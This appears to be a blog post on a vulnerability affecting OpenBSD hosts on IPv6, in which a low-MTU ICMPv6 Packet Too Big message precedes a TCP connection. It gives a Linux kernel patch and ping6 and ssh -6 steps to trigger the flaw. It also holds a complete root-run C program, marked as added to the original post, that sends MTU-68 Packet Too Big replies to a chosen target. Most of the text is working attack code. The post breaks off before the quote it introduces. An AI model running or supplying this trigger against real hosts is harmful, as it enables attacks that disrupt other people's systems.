You don't see these very often (although it has certainly happened more than once, contrary to their claims), and this one only applies to OpenBSD systems on IPv6 networks, but still, interesting.

I'm not 100% clear on the details, but it appears to be some sort of race condition involving receiving a low-MTU ICMP datagram and then initiating a TCP/IPv6 connection.

To exploit this vulnerability you will need a Linux system. Edit net/ipv6/icmp.c in Linux 2.4.24 and, in the type switch of icmpv6_rcv(), add the line marked //joro to the ICMPV6_ECHO_REPLY case (the misspelled comment is verbatim from the kernel source), so that every ICMPv6 echo reply the kernel receives is answered with an ICMPv6 Packet Too Big message advertising an MTU of 68 (the 68 is the "info" argument of icmpv6_send, which becomes the MTU field of the message):

	case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
		icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro
		break;

Recompile. Reboot. Then, with "openbsd" standing for the target host, ping it so that it sends back echo replies (each of which now provokes a Packet Too Big from the Linux box, leaving the target with a path MTU of 68 towards you), and open a TCP connection to it over IPv6:

ping6 openbsd
ssh -6 openbsd
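The same trigger can be produced from user space without rebuilding a kernel. The C program below is an added example, not part of the original post and not the discoverer's code: it opens a raw ICMPv6 socket, waits for echo replies from the target, and answers each one with an ICMPv6 Packet Too Big carrying an MTU of 68, which is exactly what the patched icmp.c does in-kernel. Both addresses are given on the command line; the local address is only needed to rebuild the IPv6 header of the quoted packet, because Linux raw ICMPv6 sockets strip it on receive. The helper name build_pkt_toobig() and the 68-byte constant's name are choices made here. It needs root for the raw socket.

```c
/* Added example, not from the original post: user-space stand-in for the
 * joro kernel patch.  Answers every ICMPv6 echo reply from <target> with an
 * ICMPv6 Packet Too Big advertising MTU 68.  Linux, needs root. */
#include <arpa/inet.h>
#include <netinet/icmp6.h>
#include <netinet/in.h>
#include <netinet/ip6.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define TOOBIG_MTU 68u   /* the patch's 'info' argument: the advertised MTU */

/* Linux raw ICMPv6 sockets hand us only the ICMPv6 message, so rebuild the
 * IPv6 header of the echo reply for quoting inside the error message. */
static void fake_ip6_hdr(struct ip6_hdr *ip6, const struct in6_addr *src,
                         const struct in6_addr *dst, uint16_t plen)
{
    memset(ip6, 0, sizeof *ip6);
    ip6->ip6_flow = htonl(6u << 28);   /* version 6, class and flow label 0 */
    ip6->ip6_plen = htons(plen);
    ip6->ip6_nxt  = IPPROTO_ICMPV6;
    ip6->ip6_hlim = 64;
    ip6->ip6_src  = *src;
    ip6->ip6_dst  = *dst;
}

/* Build an ICMPv6 Packet Too Big (type 2, code 0) in out[]: 4-byte ICMPv6
 * header, 4-byte MTU, then as much of the invoking packet as fits in the
 * minimum IPv6 MTU (RFC 4443 section 3.2).  Returns the message length or -1
 * if out[] is too small.  The checksum is left 0 because Linux computes it
 * for IPPROTO_ICMPV6 raw sockets. */
int build_pkt_toobig(uint8_t *out, size_t out_len, uint32_t mtu,
                     const struct in6_addr *quoted_src,
                     const struct in6_addr *quoted_dst,
                     const uint8_t *quoted_icmp, size_t quoted_icmp_len)
{
    const size_t max_quote = 1280 - sizeof(struct ip6_hdr) - sizeof(struct icmp6_hdr);
    struct icmp6_hdr h;
    struct ip6_hdr ip6;
    size_t quote_len = sizeof ip6 + quoted_icmp_len;

    if (quote_len > max_quote) quote_len = max_quote;
    if (out_len < sizeof h + quote_len) return -1;

    memset(&h, 0, sizeof h);
    h.icmp6_type = ICMP6_PACKET_TOO_BIG;
    h.icmp6_code = 0;
    h.icmp6_mtu  = htonl(mtu);          /* 68 here; OpenBSD records this */
    memcpy(out, &h, sizeof h);

    fake_ip6_hdr(&ip6, quoted_src, quoted_dst, (uint16_t)quoted_icmp_len);
    memcpy(out + sizeof h, &ip6, sizeof ip6);
    memcpy(out + sizeof h + sizeof ip6, quoted_icmp, quote_len - sizeof ip6);
    return (int)(sizeof h + quote_len);
}

int main(int argc, char **argv)
{
    struct in6_addr target, local;
    struct icmp6_filter f;
    int s;

    if (argc != 3) {
        fprintf(stderr, "usage: %s <target-ipv6-addr> <local-ipv6-addr>\n", argv[0]);
        return 1;
    }
    if (inet_pton(AF_INET6, argv[1], &target) != 1 ||
        inet_pton(AF_INET6, argv[2], &local) != 1) {
        fprintf(stderr, "bad IPv6 address\n");
        return 1;
    }
    s = socket(AF_INET6, SOCK_RAW, IPPROTO_ICMPV6);
    if (s < 0) { perror("socket (raw ICMPv6 needs root)"); return 1; }

    /* Deliver only echo replies, mirroring the patched kernel's case label. */
    ICMP6_FILTER_SETBLOCKALL(&f);
    ICMP6_FILTER_SETPASS(ICMP6_ECHO_REPLY, &f);
    setsockopt(s, IPPROTO_ICMPV6, ICMP6_FILTER, &f, sizeof f);

    struct sockaddr_in6 dst = { .sin6_family = AF_INET6, .sin6_addr = target };

    for (;;) {
        uint8_t in[1500], out[1280];
        struct sockaddr_in6 from;
        socklen_t fl = sizeof from;
        ssize_t n = recvfrom(s, in, sizeof in, 0, (struct sockaddr *)&from, &fl);
        if (n < (ssize_t)sizeof(struct icmp6_hdr)) continue;
        if (memcmp(&from.sin6_addr, &target, sizeof target) != 0) continue;

        int len = build_pkt_toobig(out, sizeof out, TOOBIG_MTU,
                                   &target, &local, in, (size_t)n);
        if (len < 0) continue;
        if (sendto(s, out, (size_t)len, 0, (struct sockaddr *)&dst, sizeof dst) < 0)
            perror("sendto");
        else
            printf("echo reply from %s: sent Packet Too Big, MTU %u\n",
                   argv[1], TOOBIG_MTU);
    }
}
```

Run it as root in one terminal with the target's and your own IPv6 address, then run the ping6 and ssh -6 steps above in another; every echo reply the target sends is answered with a Packet Too Big before the TCP connection is opened.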

The vulnerability discoverer's writeup is a little bit less than scholarly: